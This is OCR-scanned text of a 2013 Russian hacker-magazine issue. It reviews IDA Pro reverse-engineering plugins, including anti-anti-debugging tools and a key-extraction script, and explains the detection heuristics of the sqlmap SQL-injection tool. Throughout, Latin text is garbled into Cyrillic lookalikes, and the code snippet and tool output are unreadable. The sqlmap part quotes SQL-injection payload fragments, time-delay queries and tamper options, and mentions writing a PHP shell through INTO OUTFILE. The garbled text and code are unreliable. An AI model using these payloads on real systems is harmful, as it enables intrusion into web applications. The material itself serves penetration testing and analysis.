но может использоваться и в повседневных за- 
дачах реверсера. Если кратко, то МЮЕ заточен 
на поиск «интересных» функций и инструкций, 
он добавляет их список в сизШт ѵіеѵѵег’ы и вы- 
деляет цветом в дизассемблированном листинге. 
Итак, МНР способен: 

• выделять опасные функции (использование 
которых может привести к уязвимости, на- 
пример саіі тетсру); 

• искать инструкции сравнения (полезно 
при анализе парсеров, стр езі, 14М); 

• искать функции, связанные с файловым вво- 
дом-выводом; 

• искать функции, связанные с сетевым вво- 
дом-выводом; 

• искать функции выделения/освобождения 
памяти. 



ША8СОРЕ 

Ьіі.Іу/ПттІЭб 

Так получилось, что в 2012 году на Нех-Пауз 
РІид-Іп сопіезі оказалось два победителя, и, 
как ты догадываешься, ЮАзсоре — один из них. 
Данный плагин разрабатывался людьми, которым 
в силу специфики своей работы часто приходит- 
ся заниматься анализом вредоносного ПО, так 
что он в основном заточен на решение типичных 
задач, возникающих при реверси нге мал вар и. 
Функционал разбит на три основные вкладки. 

Вкладка Рипсйоп Іпзресііоп помогает доопре- 
делить функции, которые не смогла определить 
ЮА, и разобраться, что происходит внутри функ- 
ций (какие импортируемые функции вызываются 
и с какими параметрами). После чего в соответ- 
ствии с этим переименовать их, добавив к ним 
приставки, типа Ке&_ — если функция работает 
с реестром, Ыэ2_ — в случае работы с сетью, 
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Интерфейс ШАЗсоре 



Рі1е_ — в случае работы с файлами и так далее. 
А также переименовать потенциальные функ- 
ции-обертки — те, в которых происходит только 



лишь один вызов импортируемой функции. Так 
что за пару минут у тебя на руках уже будет до- 
статочно неплохая картина о том, за что отвечает 
большинство функций в программе и с чего стоит 
начать исследование. 

Вкладка ѴѴіпАРІ Вго\л/зіпд — это справочник 
по ѴѴіпАРІ -функциям прямо из окна ЮА Рго. Так 
как запомнить все АРІ ѴѴіпсІоѵѵз физически не- 
возможно, а лазить каждый раз на сайт МЗОЫ 
достаточно неудобно, то данная вкладка будет 
оптимальным решением. Для этого, правда, при- 
дется достать из ЗЭК так называемые МісгозоИ 
Неір СотріІесІ Зіогаде (*.НХЗ) файлы и прописать 
до них путь, чтобы ЮАЗсоре знал, куда смотреть. 

Вкладка Сгуріо ІбепМісабоп — название вклад- 
ки также соответствует предлагаемому функцио- 
налу: плагин пытается на основе базы сигнатур 
и эвристик определить хорошо известные крипто- 
алгоритмы, используемые в программе. 








ХАКЕР 10 /177/ 2013 



7 » 




Одна из вкладок ЮАЗіеа ІіН 



ЮА5ТЕАІ.ТН 

ЬіЦу/аиіхаЕ 

Плагин ЮАЗІеаШі пытается помочь отладчику ЮА 
противодействовать довольно хорошо известным 
антиотладочным приемам, которыми активно 
пользуются как программы защиты ПО, так и вре- 
доносы. Состоит из двух частей: непосредствен- 
но самого плагина и ЭШки, которая инжектится 
в отлаживаемый процесс, как только происходит 
аттач. Она реализует большинство маскирую- 
щих отладчик техник, используя либо хукинг си- 
стемных вызовов {МЮиегуЗузІетІп^огтаііоп, 
МЮиегуІп^отпаІюпРгосезз, РШСеІМОІоЬаІРІадз, 
ІМЮиегуОЬіесІ:...), либо патчинг определен- 
ных флагов (ІзЭеЬиддегРгезепТ МЭІоІэаІРІад, 
НеарРІад + РогсеРІад...} в процессе. Боль- 
шой плюс плагина — его можно использовать 
как при локальной, так и при удаленной отладке 
приложений, что очень полезно при анализе вре- 
доносного ПО. 



Т00І.ВА6 

Ьй.Іѵ/ШЬР1:Р 

Плагин от парней из Ехосіиз ІпіеІІідепсе, активно 
занимающихся поиском, эксплуатацией и покуп- 
кой уязвимостей и эксплойтов. Они не понаслыш- 
ке знают, что надо делать, чтобы найти уязвимость 
в чужом коде, так что их плагин ТооІЬад как раз 
и заточен под данную задачу, Он имеет в своем 
составе действительно большое количество раз- 
личных фишек: от управления историей коммен- 
тариев до совместного реверсинга. 

Начнем с того, что наиболее интересные с точ- 
ки зрения реверсера функции исследуемого при- 
ложения можно добавлять в историю, при этом 
учитывается отношение новых функций с уже до- 
бавленными, то есть наглядно показывается, ка- 
кая функция из какой вызывается. Это очень удоб- 
но: если ты, например, разреверсил функции, 
которые отвечают за прием данных и потенци- 
ально имеют уязвимость, то таким образом сразу 
становится понятно, по какому пути стоит дальше 
вести работу. Располагается данный функционал 
на вкладке Нізіогу. Помимо этого, там есть еще 
две очень полезные кнопки Збоѵѵ Зітіпдз и ЗИоѵѵ 
Ітрогіз, которые соответственно покажут все 
строки и все импортируемые функции, использу- 
емые в выбранной функции. А если нажать правой 
кнопкой на имя функции в окне истории и выбрать 
пункт Оиегу ЭВ, то можно запросить с определен- 
ной глубиной список вызывающих или вызывае- 
мых функций для нее. 

ТооІЬад использует собственную псевдо фай- 
ловую систему, для этого в ЮВ-файле создается 
дополнительный сегмент. В данной ФО можно 
хранить что угодно — от сессии текущей работы 
плагина до дампов сетевого трафика, приводяще- 
го к падению исследуемой программы. Так что все 
будет лежать в одном месте, и все это легко будет 
передавать между сотрудниками, работающими 
над одним проектом. Получить доступ к этому 
функционалу можно из вкладки Рііе Зузііет. 

Еще одна интересная вкладка — РаФЯпсІіпд, 
название которой говорит само за себя. При об- 
ратной инженерии часто встает вопрос: а можно 
ли из данной функции попасть в другую, или мож- 
но ли попасть из начала функции в интересующий 
базовый блок, минуя блок, содержащий вызов 
функции Тгее ( ) . Как нетрудно догадаться, данный 
плагин поддерживает поиск путей как на уровне 



функций, так и на уровне базовых блоков. А ре- 
зультат работы будет отображен в виде отдельно- 
го кликабельного графа передачи управления. 

Чтобы поделиться данными с другими ис- 
следователями, работающими над проектом, 
не нужно использовать какие-то дополнительные 
системы или задействовать расшаренные ресур- 
сы, для этого достаточно лишь зайти на вкладку 
Оиеиез. Вообще, про этот плагин можно долго 
еще писать, поэтому советую тебе самостоятель- 
но ознакомиться с остальным его функционалом 
в боевых условиях. 
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Интерфейс ТооІЬад 
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Цветовая схема Сопзопапсе в действии 



Для людей, которые значительную часть рабо- 
чего времени проводят в ЮА Рго, очень важно 
представление данных, так как от этого напрямую 
зависит производительность работы. Отчасти 
данную проблему можно решить с помощью ак- 
тивно набирающих популярность цветовых схем 
для ЮА Рго. 

Устанавливать цветовую схему можно двумя 
способами: 

1. Через файл реестра (расширение гед). Дан- 
ный способ подходит для ЮА Рго 6.3 и более 
ранних версий. Недостатком этого подхода 
является необходимость вносить изменения 
в реестр. Поэтому для возвращения в исход- 
ную схему необходимо будет предварительно 
сделать ее Ьаскир, Для этого заходим в ветку 
реестра НК Е Ѵ_СІІК К Е МТ_и $ Е К \5 о-РЫа ге \ Не х - 
КаузХЮА и экспортируем ее в файл. 



2. Через файл цветовой схемы {расширение 
сіг). Данный способ подходит для ЮА Рго 6.4 
и старше. С версии 6.4 цветовыми схемами 
можно удобно управлять из вкладки меню 
ОрТіоп — > Соіопз. 

Лучше всего подобранные и, как следствие, 
самые популярные публичные схемы: 



■ Сопзопапсе ( РіІ.Іѵ/ИІхЫ^е ): 

■ ЗоІагігесІ Рагк ( ЫМу/149ег4П . 

Также для удобства работы с цветовыми схе- 
мами (для версии 6.3 и ниже) есть скрипт ЮА Соіог 
Тбете Зсгіріз ( ЫТІѵ/РбІРЗС ). основная задача ко- 
торого — импорт/экспорт цветовых схем между 
ПЕО- и ХВ-форматами. 
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Результат работы 
НехНаузСосІеХрІогег 



НЕХ-ПАѴ5 ОЕСОМРІІ.ЕП 

Ьіі.Іѵ/ЮѴХпЬЕ 

Нех-Кауз Ресотрііег — это отдельное большое 
платное дополнение для ЮА Рго, которое реали- 
зует функционал декомпилятора (поддерживает 
х86/АВМ-архитектуры), Мало кто знает, но это 
дополнение имеет еще и собственный 50К на С/ 
С++, который значительно отличается от ЗРК иды, 
но также позволяет писать плагины. Кроме того, 
умельцы уже создали и Ьіпсііпд для РуіЬоп под на- 
званием Ьехгауз-руШоп (Ьіі.Іѵ/ і89Асі Ц ). 

Яркий представитель плагинов для Нех-Науз — 
НехРаузСобеХрІогег, дополнение, которое улуч- 
шает навигацию по объектно-ориентированному 
коду. Любой ресерчер, кто исследовал приложе- 



ния на С++, понимает, что ЮА не поддерживает 
абстракцию на уровне объектов. Однако тут можно 
выкрутиться за счет представления объектов в виде 
структур. НехРаузСобеХрІогег добавляет навига- 
цию по функциям внутри этих структур, которые 
отождествляют, например, вызов конструктора или 
деструктора. Также на борту НехПаузСосіеХрІогег 
есть функционал для автоматической реконструк- 
ции некоторых объектно-ориентированных кон- 
струкций и навигации по таблицам виртуальных 
функций. Этот плагин очень полезен при статиче- 
ском анализе больших программ, разработанных 
на С++. Авторы обещают развивать его дальше 
и открыть исходные коды после оглашения разул ь- 
татов конкурса Нех-Пауз РІид-Іп сопіезі. 



Яркий представитель плагинов для Нех-Кауз — НехКаузСойеХрІогег, дополнение, 
которое улучшает навигацию по объектно-ориентированному коду 



ОВ-5ѴНС 

Ы1. Іѵ/ІбгЛа и 

Одна из крутых фич ЮА Рго, которой недостает многим хорошим отладчикам, — возможность предста- 
вить ассемблерный код в виде графа. Так ассемблерный листинг становится более читабельным, а ско- 
рость отладки/реве реи н га резко возрастает. К сожалению, мощный ѴѴіпРЬд похвастаться такой функцией 
не может. Чтобы свести воедино мощь двух популярных инструментов, можно воспользоваться расши- 
рением дЬ-зупс. Оно позволяет динамически синхронизировать окно ЮА-графа с текущей позицией 
в ѴѴІпЭЬд. Так что все, что ты делаешь в ѴѴіпЭЬд, можно быстро перенести в качестве комментария в ЮА 
и при этом все отслеживать на наглядном графе. Особенно удобно пользоваться этим плагином при на- 
личии двух мониторов. 

ОІЛ.ѴМІСПАТЕ 



При реверс-инжиниринге редко когда 
дело обходится только одним инстру- 
ментом. Не исключение и дизассем- 
блеры с отладчиками. Каждый отладчик 
имеет как сильные, так и слабые сторо- 
ны, и у каждого они свои — идеального 
инструмента нет. В одном удобно обхо- 
дить антиотладочные приемы, в другом 
использовать огромный арсенал уже 
готовых плагинов, а в третьем писать 
собственные скрипты. С недавних пор 
стало возможно работать последова- 
тельно сразу в ОІІуОЬдІ/2, Іттипііу 
РеЬиддег, ЮА Рго и ѴѴіпОЬд. Благодаря 
ОІІуМідгаІе РІидіп Г эіІ.Іѵ/ІЫдТЭі ) можно 
передавать процесс отладки другому 
отладчику без перезапуска, Так что мы 
можем задействовать только сильные 
стороны каждого отладчика, используя 
миграцию от одного к другому. 



ЮМ 




РІШСАР 

ЬІІ. I ѵ/10оО аа7 

Рипсар добавляет гипііте-информацию в дизас- 
семблированный листинг ЮА в виде коммента- 
риев и подсветки кода. При этом он единствен- 
ный плагин в обзоре, который для своей работы 
требует, чтобы исследуемое приложение было 
запущено из-под отладчика ЮА. Он записывает 
параметры, которые поступают на вход функци- 
ям, и значения, которые функции возвращают. 
Вся эта информация может дампиться как в тек- 
стовый файл, консоль, так и в виде комментариев 
к инструкциям САН, естественно, что в консоли 
и в текстовом файле информация более подроб- 
ная. Также Рипсар очень полезен при идентифи- 
кации косвенных вызовов, типа САН еах. Плагин 
сразу подпишет, на какой адрес или функцию был 
совершен переход. Идем дальше — благодаря 
команде сІ.сосІе_с1ізсоѵегу = Тгие плагин спо- 
собен идентифицировать функции, которые ЮА 
не смогла распознать на стадии статического ана- 
лиза (что бывает часто). По завершении работы 
отображается граф вызовов функций, в котором 
присутствуют уже разрезолвенные косвенные вы- 
зовы. Поддерживает х86/х64 и АНМ архитектуры. 



ІРД РДК Т (рЬр гНрмГІ ірНаічр ] 
ризй 1 ; йнтіэдв 

рйьіі рак ; 1 р НеиР і 1 рНдггш 

риаП Р 5 І ; Ір Еяі я'ЬіядГіІдНзр р 

лгд_80: 0x00^*0-431 --> ’С:\Росип№Піі5 апЛ 5еН1лд5\Ййп1пН1:гаС:иг\госа1 $*Иіпд5\Й0$е55Идг ‘ 

аі-'і ВЦ: ВхОвіг^вС ’С:ЛІЮСиЖ“' 1 \ЛІ 1 іНІН 1 "' 1 \іаСй 15 "' 1 \ТЕ^\' н ЕІд 29 . 1 тр' 
агд_а«: и* ши наши -> ‘М/й* 
сан йз:Ми4г! і-нп ; иегпевРІяЬиргіігЁкАП 

ЁЙЗІ: 9x00080001 --> ■«/*■ ~ 

ч аі-д ИЙ: ЙХЙИ4Й4314 > "С :\Ьйг.«прпІ-5 яппі (іпд; \Агіпі п іагѴІасаІ Ир Из рд5\ ДР $е-5к|1ді|, 1 
5 _згд“ 9 Ч: ОХ 0012 ІЛ 8 С — > ■сіѵвосииЕ^ПйВМШТ'імост.^імепр^Еааг^лпр' 
і АГд_ 0 Ят 8 x 00090 : 00 * — > 'М/Й' 



Результат работы Аз пса р в окне ЮА 



Как ты знаешь, ЮАРуІЬоп — это всего лишь обертка над ЮА ЗЭК. И по тем или 
иным причинам не для всех функций существует биндинг. Но это не беда, так 
как можно самому его реализовать с помощью библиотеки сіурез. 

Например, кросс- платформенная реализация вызова §еі_1оасіег_пате() 
будет выглядеть так: 

ітрогі: сіурез 

ісіапате - ЕА64 

зуз .рІаі-Рогт == : 

сііі - с±урез,ціпсІ11[ ісіапате + ] 



зуз . р іа і-рогт == 



^ ^ ^ ^ и *— ■ 1 V 1 1 1 Р 

СІ11 = СІурѲБ . ССІ11Г 


■ 

+ 


ісіапате + 


] 


5Ѵ5 • ріаіі^огт -= 


ѣ 

* 






сіи = сіурез . ссІІІГ 


+ 


ісіапате + 






ЬиЕ = оЬуре5 . сгеабе зігіпе 


Ьиі 


■Рег( ) 




сііі.ееі: Іоасіег пате(Ьи-Р. 


) 






ѵ і і_ ЬиЕ . гам 



Подобным образом благодаря сіурез можно использовать почти любой 
вызов из ЮА ЗйК. 
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ВАІІ.8 

ЫМѵ/15СІ1Іі4 

Обычно, исследуя сложную программу, приходится реверсить 
несколько файлов — например главный модуль программы 
и наиболее интересные с точки зрения ресерчера динамиче- 
ские библиотеки, в которых могут скрываться уязвимости, за- 
щитные механизмы и прочее. И тут есть проблема. Допустим, 
ты отреверсил какую-то 01_І_-библ потеку и принялся за экзеш- 
ник, В процессе исследования обнаруживается, что в коде вы- 
зывается функция из той самой библиотеки, но что она делает 
и какие параметры принимает — ты не помнишь. Приходится 
запускать еще одну копию ЮА Рго, загружать соответствую- 
щую ісІЬ-базу и искать в ней нужную функцию. И чем сложнее 
программа, тем чаще придется совершать подобные дей- 
ствия. К счастью, этот процесс можно значительно упростить, 
воспользовавшись плагином Наііз. Он позволяет работать 
сразу над несколькими бинарниками, при этом сохраняя каж- 
дую ібб-базу изолированной от остальных. С помощью Наііз 
можно легко просматривать комментарии к функциям, нахо- 
дящимся в других запущенных экземплярах ЮА, переходить 
непосредственно к нужной функции в любом из запущенных 
экземпляров, а также легко управлять несколькими копиями 
ЮА Рго. Увы, доступен Раііз только для 05 X. 




Работаем с несколькими экземплярами ЮА Ргос помощью Наііз 



ВМ ЕСТО ЗАКЛ ЮЧЕН ИЯ 

Плагины сильно упрощают жизнь, но, естественно, не покры- 
вают весь спектр стоящих перед реверсером задач. Поэтому 
от таргета к таргету появляются все новые и новые скрипты, 
которые решают различные специфичные задачи. Так что будь 
готов к тому, что в один прекрасный момент тебе придется от- 
крыть ЮЕ и начать писать собственное расширение (можешь 
потом выставить его на Нех-Рауз РІид-Іп сопіезі и даже вы- 
играть денежный приз). Удачи! ЗЕ 



Для корректной работы 
большинства плагинов 
из данного обзора нужна 
ЮА Рго версии >6.1 
испециаіьная версия 
РуЗісІе от Нех-Вауз. 



// / 



гг* 



NN \\ 



N // 



г мтл 



Все упомянутые в статье 
плагины и скрипты ждут 
тебя на диске. 



МЕЛОЧИ ЖИЗНИ РЕВЕРСЕРА 

Приведу еще список скриптов/плагинов, которые сильно упрощают повседневную жизнь 
реверсера: 

* ТіпсІсгур1:2 — помогает определить, какие криптоалгоритмы и хеш-функции использу- 
ются в программе; 

* деікеуз.ру — скрипт для извлечения закрытых ВЗА-ключей и сертификатов; 

* ібаЫпд — поиск имен функций в МЗРЫ через поисковый движок Віпд; 
ЮАѴѴіпНеІрѴіеѵѵег — встраивает в ЮА справочник по инструкциям для процессора х86; 

* оріітісе — плагин для деобфускации кода; 

* соІІаЬгеаіе — плагин для организации совместного реверсинга; 

* іба-ітапзіаіюг — перевод строк через Соодіе Тгапзіаіе на английский язык. 




Начиная с 2009 года команда Нех-Вауз ежегод- 
но проводит конкурс среди плагинов для ЮА 
Рго. В данном соревновании может принять 
участие любой обладатель лицензионной вер- 
сии программы, прислав свой инновацион- 
ный/полезный модуль, написанный на любом 
из языков программирования. В случае попа- 
дания в тройку счастливчиков, кроме упомина- 
ния автора на сайте Нех-Вауз, можно выиграть 
1900, 950 или 450 долларов в зависимости 
от занятого места. 

Итоги предыдущих конкурсов можно по- 
смотреть на официальном сайте — Ііех 
гауз.сот/сопіезіз . Кстати, настоятельно ре- 
комендую ознакомиться со всеми плагинами 
в этом разделе — найдешь много интересного. 



ЯЗЫКИ РАЗНЫЕ, 

А СМЫСЛ ОДИН 

Универсальных плагинов на все случаи жизни 
для ЮА нет, впрочем, как и для других инстру- 
ментов. Поэтому рано или поздно настанет 
момент, когда придется допиливать сторон- 
ний плагин под свои нужды или писать свой. 

На сегодняшний день собственные расшире- 
ния можно реализовывать чуть ли не на любом 
языке. Вот список лишь тех, которые сразу 
пришли на ум: 

• С/С++; 

• ЮС (ЬіШШВЕгюА); 

• Руіііоп (ІРАРѵіИопІ Г > і1.Іѵ/12МІх1ѵѵ У: 

• ВиЬѵ (ІгіаВиЫ ( ЬіМѵ/140І(зВВ У: 

• РегІ (ЮА) ( ЬіМѵ/1 5ИІтРѵ У: 

• Заѵа (ІсЫаѵа) ( Ьіі.Іѵ/1545СР7 ): 

• 4аѵа5сгірі (ЮАиЗсгІрі) ( ЬІ1.Іѵ/154555г ): 

• ОсатІ (ЮАОСатІ), ( ЬіМу/іЬфВа ). 

Сразу предупрежу, что большинство из этих 
биндингов давненько не поддерживается, 
так что использовать всю мощь родного 5РК, 
к сожалению, не получится (но так как они 
в основном распространяются с исходным 
кодом, ты всегда можешь продолжить их под- 
держку собственными усилиями). Наибольшие 
возможности в плане встроенных функций 
присутствуют в плагинах на С/С++. А активнее 
всех используются при написании скриптов 
и плагинов для ЮА Рго С/С++ и Руібоп. Поэтому 
больше всего примеров в Сети ты встретишь 
именно на них. С/С++ изначально поддержи- 
вался из коробки, а биндинг для РуШоп раньше 
был отдельным проектом и лишь со временем 
стал входить в состав продукта. 

Что касается документации по АРі, то тут 
лучшим справочником будут исходники файлов 
из ЗЭК. Также могу посоветовать документ ЮА 

ршѳ-іічѵѵвтмѳ іы с/с++ (щщшш), 

в котором описывается большинство функций 
и процесс написания плагинов на С/С++, и, 
конечно, книжку Тбе ЮА Рго Ъоок: Тбе Ыпоібсіаі 
Ѳиібе Іо ѴѴогІсГз Мозі Рориіаг РізаззетЫег, где 
есть целый раздел под названием Ехіепбіпд 
ЮА’з сараЬШез. 










ХАКЕР 10/177/2013 




Знакомимся с алгоритмами для быстрого 
поиска $ОЬ-инъещий 



Искать и эксплуатировать ЗОЕ-инъекции с помощью зцітар 
достаточно просто. Но за видимой простотой скрываются слож- 
ные алгоритмы, математические методы, которые и позволяют 
за считаные минуты найти уязвимый параметр или подобрать 
количество полей в запросе. О них мы сегодня и поговорим. 
Ведь зная, как функционирует инструмент изнутри, ты сможешь 
более продуктивно использовать его в своих тестах на проник- 
новение. 



ХАКЕР 10/177/2013 
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ЭВРИСТИКА НА СЛУЖБЕ 5СК.МАР 

Уязвимые к 50 1_- инъекции веб-приложения ча- 
сто сконфигурированы так, что выводят пользо- 
вателю все сообщения об ошибках (например, 
при включенной опции сІі5р1ау_еггог5 в РНР). 
Если отправить недопустимое значение параме- 
тра (например, ()) веб-приложение 

ответит подробным сообщением об ошибке 
СУБД. 

Зцітар использует этот вид эвристики для не- 
скольких целей. Первая проверка позволяет по- 
нять, какой сервер СУБД используется. Напри- 
мер, в случае если сервер возвращает ответ: 

5(2І_ еггогі. Уои Ьаѵе ап еггог іп уоцг 
50^_ зупбах.;_ сНеск ІЬе тапиаі іЬа± 
соггезропсІ5 Іо уоиг МуБС^Е зегѵег 
ѵегзіоп -Рог ТНе гі^ІгЕ зуігЬах іо изе 
пеаг..,! 

то зцітар делает вывод, что он имеет дело 
с МуЗОЕ. С этого момента будут проводиться 
только МуЗОЕ-ориентированные тесты, причем 
фильтр будет работать как для тестов на более 
высоком уровне (опция --Іеѵеі), так и для рас- 
ширенных наборов тестов (опция --гізк). В слу- 
чае проверки сразу нескольких ЕІПЕ (ключ -т), 
если задать опцию --зіпагТ:, зцітар быстренько 
просмотрит каждый адрес и выполнит подробное 
тестирование только тех, которые положитель- 
но «откликнутся» на эту эвристическую проверку 
(будут вызывать сообщение об ошибке СУБД). Та- 
ким образом зцітар может найти потенциальную 
цель в течение нескольких минут. 

Вторая эвристическая проверка 301- 
инъекции проводится на параметрах, принима- 
ющих целочисленные значения. Когда параметр 
является динамическим (то есть с изменением 
его значения меняется ответ веб-сервера), а от- 
вет оказывается одинаковым как для арифме- 



тической операции (например, іс!=1183-і182), 
так и для первоначального значения (ісі=1), 
зрітар предупредит пользователя о том, что об- 
рабатываемый параметр, скорее всего, склонен 
к ЗОБ- инъекции. Это делается главным образом 
для уведомления юзера, чтобы в случае, если 
зрітар не сможет найти подходящую технику 
эксплуатации, пользователь продолжил и провел 
несколько дополнительных тестов, Например, 
если используется какой-то механизм защиты, 
нахождение метода его обхода в виде скрипта, 
обфусцирующего отправляемый рауіоасі (опция 
--ѣатрег^Ье-Ыееп), может означать разницу меж- 
ду успехом и неудачей. 

Третья эвристическая проверка делается 
в том случае, если сообщения об ошибках в СУБД 
выключены и обнаружена по крайней мере одна 
общая (не зависящая от СУБД) техника 301- 
инъекции (например, депегісЬооІеап-Ьазеб Ыіпсі), 
Тогда для каждой из поддерживаемых СУБД от- 
сылается один запрос в форме, поддерживаемой 
только конкретно ею (например, в случае МуЗОБ 
ІСІ=1 АНО (5ЕЕЕСТ 0x41597548 )=0х41597548)). 
Если пришедший ответ совпал с ожидаемым, 
то зрітар делает вывод, что СУБД идентифици- 
рована, и проводит дальнейшие тесты только 
для нее, как и в случае первой проверки. 

ВЫЯВЛЯЕМ ПРИВЕДЕНИЕТИПОВ 

В некоторых случаях веб-приложения использу- 
ют явное приведение типов для предотвращения 
ЗОБ-инъекций. Это особенно заметно на цело- 
численных значениях параметров (например, 
16 = 1 ). 

Если при изменении этого целочисленного 
параметра сервер возвращает разные ответы, 
а при добавлении к нему произвольной строки 
(например, ісІ=1ѵНхг) возвращается то же самое 
значение, мы можем с большой уверенностью 
сказать, что используется приведение типов. 



В таких случаях зрітар предупреждает поль- 
зователя сообщением и просит выбрать, хочет ли 
он удалить текущий параметр из дальнейших ис- 
пытаний и тем самым сохранить время сканиро- 
вания. Это особенно полезно, когда пользователь 
не уверен, следует ли ему провести более деталь- 
ные тесты на данном параметре или просто про- 
пустить его и начать тестировать другие. 

ОТЛАВЛИВАЕМ ОГРАНИЧЕНИЕ НА ДЛИНУ 
СТРОКИ 

ЗиИозіп — популярный патч с открытым кодом, 
используемый для защиты серверов и пользо- 
вателей от известных и неизвестных брешей 
в РНР- приложен иях и ядре языка РНР. И хотя 
он не предлагает явной защиты от ЗОБ-инъекций, 
но накладывает ограничение на длину значений 
параметров запроса (например, ограничивает 
длину значений параметров СЕТ-запроса 512 
символами). Это создает проблемы при проведе- 
нии ЗОБ-инъекций в случаях, когда используются 
более длинные рауіоасі ’ы (например, инжект РНР- 
шелла через оператор 5Е БЕСТ .. ШТО ОІЛРІІЕ). 

После того как ЗОБ-инъекция успешно иден- 
тифицирована, зцітар посылает один длинный 
запрос, содержащий простой логический во- 
прос (например, 3182=3182). Если веб-сервер 
не отвечает в нужной форме (например, пустым 
ответом), мы можем быть уверены, что на веб- 
сервере имеется какой-то механизм ограни- 
чения длины, например такой же, как уже упо- 
мянутый патч Зиіюзіп. В таких случаях зцітар 
предупреждает пользователя, что в дальнейшей 
работе его ожидают проблемы. Единственное, 
чем можно воспользоваться в данном случае, 
чтобы попытаться избежать этой проблемы, — 
это отключить в зцітар механизм экранирова- 
ния строк (где, например, запросы типа 5ЕБЕСТ 
’РооЬаг' для МуЗОЕ превращаются в 5ЕБЕСТ 
0Х666Р6Р626172), используя ключ --по-езсаре. 
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Значение параметра ісі приводится к іпТедег с помощью іпТѵаі() 



Здітар определил, что целевая СУБД — МуЗОБ 
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Выявили наличие ограничения на длину параметров 
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Похоже, что цель защищена веб-файрволом 
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Определяем СУБД с помощью третьей эвристической проверки 



Проверка показала, что параметр Ісі может быть уязвим к ЗОБ- инъекциям 
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Значительные задержки во времени ответов, надо установить большее значение 
--гіте-зес 



Зцітар идентифицировал установленный МосІБесигігу 
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вяітар предлагает оптимизировать значение задержки 
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5дІтар обнаружил ложное срабатывание 



Тіте-Ьазесі техника в действии 



Таким образом, рауіоаб’ы станут более коротки- 
ми, но при этом мы рискуем тем, что одинарные 
кавычки ( ’ ) могут быть экранированы (например, 
с помощью РНР-функции ту5д1_геа1_е5саре_ 
5І:гігщ()), а полезные нагрузки станут более за- 
метными в логах веб-сервера. 

ОБНАРУЖЕНИЕ №АР 

ѴѴАР- продукты (ѵѵеб арріісагіоп ТігеѵѵаіІ — бранд- 
мауэр для веб-приложений) — широко исполь- 
зуемый механизм для предотвращения злонаме- 
ренных атак на веб-приложения. Каждый из них 
может быть опознан как с помощью уникального 
ответа на обнаруженную атаку, так и через встав- 
ку конкретного НТТР-заголовка (заголовков). На- 
пример, МосІЗесигіІу возвращает 501 НТТР код 
ошибки при обнаружении атаки, в то время как Р5 
ВІ0-ІР добавляет свой собственный Х-Спесгіоп 
НТТР заголовок в ответ. 

Зрітар включает в себя функции обнаруже- 
ния (ключ — сйеск-ШАР) и распознавания (ключ 
--ісіегѵгі-Ру-ЫАР) около 30 различных ѴѴАР (таких 
как Аігіоск, Ваггасиба и другие). Для обнаружения 
работы веб-файрвола используется намеренно 
созданный подозрительный ЗОЬ іпіесгіоп рауіоаб 
е качестве значения неиспользуемого параметра 
со случайным именем (например, і-Р2ху). Если 
в результате отправки такого запроса веб-сервер 
возвращает содержимое, заметно отличающееся 
от оригинала, зрігпар может решить, что какой-то 
механизм защищает целевое веб-приложение. 
Для идентификации ѴѴАР используются не- 
сколько различных «полезных нагрузок», харак- 
терных для различных атак на веб-приложения, 
приходящие ответы анализируются в скриптах, 
отвечающих за идентификацию различных веб- 



файрволов (директория маР внутри зцітар). 
В случае успеха скрипт вернет зцітар логическое 
значение гше, чтобы сообщить, что целевой ѴѴАР 
успешно обнаружен. 

ОБНАРУЖЕНИЕ ЛОЖНЫХ 
СРАБАТЫВАНИЙ 

Ложное срабатывание (или ложная тревога) — 
это термин, используемый для описания резуль- 
тата, который показывает, что данное условие 
присутствует, когда на самом деле это не так. 
Это реальная проблема, потому что у пользо- 
вателя возникает ложное чувство уверенности, 
когда на самом деле в веб-приложении абсо- 
лютно нечего эксплуатировать. Это особенно 
заметно в Ьооіеап-Ьазеб и гіте-Ьазеб слепых 
методах. В случае Ьооіеап-Ьазеб, если целе- 
вое веб-приложение содержит динамические 
части (например, рекламу), или в случае Ііте- 
Ьазеб, если время ответа веб-сервера включает 
в себя значительные сетевые задержки, инстру- 
менты для автоматического обнаружения $ОІ_- 
инъекций могут запросто сделать неправильный 
вывод. 

Чтобы избежать такого рода ошибок, после 
фазы обнаружения зрітар проводит простые 
тесты. В случае если целевое веб-приложение 
не в состоянии ответить ожидаемым образом 
на предопределенную логическую операцию (на- 
пример, ісі=1 АМО 95>27), зрітар может сделать 
заключение, что он имеет дело с Іаізе розіііѵе. 

Бчітар проводит такого рода тесты только 
в тех случаях, когда никакие другие методы, кро- 
ме слепых Ьооіеап-Ьазеб и гіте-Ьазеб техник, 
уже не доступны для использования, так как лож- 
ные срабатывания обычно возникают из-за не- 



детерминированной природы дифференциации 
ответов веб-страницы. Это означает, например, 
что если целевое веб-приложение возвращает 
ожидаемую строку в случае метода, основанного 
на ошибках (еггог-Ьазеб), то нет никакой необхо- 
димости в такого рода тестировании. 

Нередки также случаи, когда значения вход- 
ных параметров предварительно обрабатыва- 
ются, чтобы отфильтровать и/или закодировать 
специальные символы (например, при помо- 
щи РНР-функции Мі:т1$ресіа1сІіаг5( )). Так 
как зцітар активно использует знак «больше» (>) 
для операции сравнения в слепом ЬооІеап-ЬазесІ 
и Ііте-ЬазесІ методе, это будет препятствовать 
его нормальной работе. Соответственно, поль- 
зователю выдается предупреждение, что ему 
следует перезапустить программу, выбрав под- 
ходящий сценарий для обфускации рауіоаб’а (на- 
пример, --г:атрег=Ьег:иееп}, чтобы решить дан- 
ную проблему. 

ОБНАРУЖЕНИЕ ЗАДЕРЖКИ 

В технике слепого метода, основанной на изме- 
нении времени (гіте-базеб), атакующий пытается 
сделать преднамеренную задержку в ответе сер- 
вера на основе условного выражения, содержа- 
щего в себе вопрос, который является «истиной». 
Измеряя время отклика целевой системы, он мо- 
жет сделать вывод. Если цель отвечает с замет- 
ной задержкой, атакующий может сделать вывод, 
что ответ — Ігие, в то время как в случае, если 
цель отвечает обычным образом, он может сде- 
лать вывод, что ответ — !а1зе. 

Задержка в сети, из-за своей недетермини- 
рованности, является главным врагом временной 
техники. Если, скажем, сервер отвечает за одну 
секунду, а диапазон нормального времени 
для отклика составляет от 0,5 до 1,5 с, то очень 
трудно сделать вывод, является ли ответ Ігие или 
Іаізе. Другой случай — когда не установлено кон- 
кретное значение параметра промежутка време- 
ни, как в рауіоасі’ах на базе тяжелых запросов (на- 
пример, 5ЕЬЕСТ СОШТ (*) РКОМ АІЩ_ІІ5ЕК5 Т1, 
Т2 АИ_ІІ5ЕК5, АИ_ІІ5ЕК5 ТВ, Т4 АІ_Е_Ц5ЕК5). 
В этих случаях нет простого способа определить, 
имела место задержка или нет. 
